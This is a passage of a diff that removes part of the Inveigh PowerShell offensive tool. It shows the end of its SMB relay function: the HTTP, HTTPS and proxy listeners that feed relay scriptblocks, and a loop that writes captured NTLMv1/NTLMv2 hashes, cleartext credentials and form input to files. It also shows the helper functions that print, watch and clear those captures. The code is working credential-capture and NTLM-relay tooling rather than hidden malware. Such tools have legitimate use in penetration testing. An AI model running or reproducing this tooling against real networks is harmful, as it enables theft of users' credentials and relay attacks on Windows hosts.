- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
-
- }
-
- }
-
- if($inveigh.running)
- {
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- Start-Sleep -S 1
- $inveigh.running = $false
- }
-
- if($inveigh.relay_running)
- {
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- Start-Sleep -S 1
- $inveigh.relay_running = $false
-
- }
-
- $inveigh.HTTPS = $false
- }
-
- if($RunTime)
- {
- $control_timeout = New-TimeSpan -Minutes $RunTime
- $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- while($inveigh.relay_running)
- {
-
- if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
- {
- Start-Sleep -S 5
- StopInveigh "disabled relay"
- }
-
- if($RunTime)
- {
-
- if($control_stopwatch.Elapsed -ge $control_timeout)
- {
- StopInveigh "run time"
- }
-
- }
-
- if($inveigh.file_output -and -not $inveigh.control)
- {
-
- while($inveigh.log_file_queue.Count -gt 0)
- {
- $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
- $inveigh.log_file_queue.RemoveAt(0)
- }
-
- while($inveigh.NTLMv1_file_queue.Count -gt 0)
- {
- $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
- $inveigh.NTLMv1_file_queue.RemoveAt(0)
- }
-
- while($inveigh.NTLMv2_file_queue.Count -gt 0)
- {
- $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
- $inveigh.NTLMv2_file_queue.RemoveAt(0)
- }
-
- while($inveigh.cleartext_file_queue.Count -gt 0)
- {
- $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
- $inveigh.cleartext_file_queue.RemoveAt(0)
- }
-
- while($inveigh.form_input_file_queue.Count -gt 0)
- {
- $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
- $inveigh.form_input_file_queue.RemoveAt(0)
- }
-
- }
-
- if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
- {
-
- while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
- {
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- Start-Sleep -m 5
- }
-
- }
-
-# HTTP Listener Startup Function
-function HTTPListener()
-{
- $HTTPS_listener = $false
- $proxy_listener = $false
- $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
- $HTTP_runspace.Open()
- $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $HTTP_powershell = [PowerShell]::Create()
- $HTTP_powershell.Runspace = $HTTP_runspace
- $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($irkin_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $HTTP_powershell.BeginInvoke() > $null
-}
-
-Start-Sleep -m 50
-
-# HTTPS Listener Startup Function
-function HTTPSListener()
-{
- $HTTPS_listener = $true
- $proxy_listener = $false
- $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
- $HTTPS_runspace.Open()
- $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $HTTPS_powershell = [PowerShell]::Create()
- $HTTPS_powershell.Runspace = $HTTPS_runspace
- $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($irkin_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $HTTPS_powershell.BeginInvoke() > $null
-}
-
-Start-Sleep -m 50
-
-# Proxy Listener Startup Function
-function ProxyListener()
-{
- $HTTPS_listener = $false
- $proxy_listener = $true
- $proxy_runspace = [RunspaceFactory]::CreateRunspace()
- $proxy_runspace.Open()
- $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $proxy_powershell = [PowerShell]::Create()
- $proxy_powershell.Runspace = $proxy_runspace
- $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $proxy_powershell.AddScript($irkin_functions_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
- $proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
- $Service).AddArgument($SMB_version).AddArgument($Target).AddArgument($Usernames).AddArgument(
- $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
- $proxy_powershell.BeginInvoke() > $null
-}
-
-# Control Relay Startup Function
-function ControlRelayLoop()
-{
- $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
- $control_relay_runspace.Open()
- $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
- $control_relay_powershell = [PowerShell]::Create()
- $control_relay_powershell.Runspace = $control_relay_runspace
- $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
- $RelayAutoExit).AddArgument($RunTime) > $null
- $control_relay_powershell.BeginInvoke() > $null
-}
-
-# HTTP Server Start
-if($HTTP -eq 'Y')
-{
- HTTPListener
-}
-
-# HTTPS Server Start
-if($HTTPS -eq 'Y')
-{
- HTTPSListener
-}
-
-# Proxy Server Start
-if($Proxy -eq 'Y')
-{
- ProxyListener
-}
-
-# Control Relay Loop Start
-if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $RelayAutoExit -or $RunTime)
-{
- ControlRelayLoop
-}
-
-# Console Output Loop
-try
-{
-
- if($inveigh.console_output)
- {
-
- if($ConsoleStatus)
- {
- $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- :console_loop while($inveigh.relay_running -and $inveigh.console_output)
- {
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.console_queue[0])
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
- {
-
- if($ConsoleOutput -eq 'Y')
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- default
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.console_queue[0])
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
- {
-
- if($inveigh.cleartext_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
- $inveigh.cleartext_list.Sort()
-
- foreach($unique_cleartext in $inveigh.cleartext_list)
- {
- if($unique_cleartext -ne $unique_cleartext_last)
- {
- Write-Output($unique_cleartext + $inveigh.newline)
- }
-
- $unique_cleartext_last = $unique_cleartext
- }
-
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
- }
-
- if($inveigh.NTLMv1_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
- {
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output($unique_NTLMv1 + $inveigh.newline)
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
-
- $unique_NTLMv1_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
- {
- Write-Output($NTLMv1_username + $inveigh.newline)
- }
-
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
- }
-
- if($inveigh.NTLMv2_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
- $inveigh.NTLMv2_list.Sort()
-
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
-
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output($unique_NTLMv2 + $inveigh.newline)
- }
-
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
-
- $unique_NTLMv2_account_last = ''
- Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
-
- foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
- {
- Write-Output($NTLMv2_username + $inveigh.newline)
- }
-
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
- }
-
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-
- }
-
- if($inveigh.console_input)
- {
-
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- }
-
- Start-Sleep -m 5
- }
-
- }
-
-}
-finally
-{
-
- if($Tool -eq 2)
- {
- $inveigh.relay_running = $false
- }
-
-}
-
-}
-#End Invoke-InveighRelay
-
-function Stop-Inveigh
-{
-<#
-.SYNOPSIS
-Stop-Inveigh will stop all running Inveigh functions.
-#>
-
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
- {
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
- {
- $certificate_store.Remove($certificate)
- }
-
- $certificate_store.Close()
- }
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- }
-
- }
-
- }
-
- if($inveigh.relay_running)
- {
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
- }
-
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.relay_running = $false
-
- }
-
- if($inveigh.running)
- {
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
- }
-
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.running = $false
-
- }
-
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
- }
- else
- {
- Write-Output("There are no running Inveigh functions")
- }
-
-}
-
-}
-
-function Get-Inveigh
-{
-<#
-.SYNOPSIS
-Get-Inveigh will get stored Inveigh data from memory.
-
-.PARAMETER Console
-Get queued console output. This is also the default if no parameters are set.
-
-.PARAMETER Learning
-Get valid hosts discovered through spoofer learning.
-
-.PARAMETER Log
-Get log entries.
-
-.PARAMETER Cleartext
-Get captured cleartext credentials.
-
-.PARAMETER CleartextUnique
-Get unique captured cleartext credentials.
-
-.PARAMETER NTLMv1
-Get captured NTLMv1 challenge/response hashes.
-
-.PARAMETER NTLMv1Unique
-Get the first captured NTLMv1 challenge/response for each unique account.
-
-.PARAMETER NTLMv1Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-
-.PARAMETER NTLMv2
-Get captured NTLMv1 challenge/response hashes.
-
-.PARAMETER NTLMv2Unique
-Get the first captured NTLMv2 challenge/response for each unique account.
-
-.PARAMETER NTLMv2Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-
-.PARAMETER POSTRequest
-Get captured POST requests.
-
-.PARAMETER POSTRequestUnique
-Get unique captured POST request.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Console,
- [parameter(Mandatory=$false)][Switch]$Learning,
- [parameter(Mandatory=$false)][Switch]$Log,
- [parameter(Mandatory=$false)][Switch]$NTLMv1,
- [parameter(Mandatory=$false)][Switch]$NTLMv2,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
- [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
- [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$POSTRequest,
- [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if($Console -or $PSBoundParameters.Count -eq 0)
-{
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- }
-
-}
-
-if($Log)
-{
- Write-Output $inveigh.log
-}
-
-if($NTLMv1)
-{
- Write-Output $inveigh.NTLMv1_list
-}
-
-if($NTLMv1Unique)
-{
- $inveigh.NTLMv1_list.Sort()
-
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
- {
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output $unique_NTLMv1
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
- }
-
-}
-
-if($NTLMv1Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
-
-if($NTLMv2)
-{
- Write-Output $inveigh.NTLMv2_list
-}
-
-if($NTLMv2Unique)
-{
- $inveigh.NTLMv2_list.Sort()
-
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
-
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output $unique_NTLMv2
- }
-
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
-
-}
-
-if($NTLMv2Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
-
-if($Cleartext)
-{
- Write-Output $inveigh.cleartext_list
-}
-
-if($CleartextUnique)
-{
- Write-Output $inveigh.cleartext_list | Get-Unique
-}
-
-if($POSTRequest)
-{
- Write-Output $inveigh.POST_request_list
-}
-
-if($POSTRequestUnique)
-{
- Write-Output $inveigh.POST_request_list | Get-Unique
-}
-
-if($Learning)
-{
- Write-Output $inveigh.valid_host_list
-}
-
-}
-
-function Watch-Inveigh
-{
-<#
-.SYNOPSIS
-Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
-
-.PARAMETER ConsoleOutput
-(Medium,Low) Medium and Low can be used to reduce output.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if($inveigh.tool -ne 1)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
- {
- Write-Output "Press any key to stop real time console output"
- $inveigh.console_output = $true
-
- :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
- {
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
- {
-
- if($ConsoleOutput -eq 'Y')
- {
- Write-Output $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
- {
- Write-Output $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- Start-Sleep -m 5
- }
-
- }
- else
- {
- Write-Output "Inveigh isn't running"
- }
-
-}
-else
-{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
-}
-
-}
-
-function Clear-Inveigh
-{
-<#
-.SYNOPSIS
-Clear-Inveigh will clear Inveigh data from memory.
-#>
-
-if($inveigh)
-{
-
- if(!$inveigh.running -and !$inveigh.relay_running)
- {
- Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
- }
- else
- {
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
- }
-
-}
-
-} \ No newline at end of file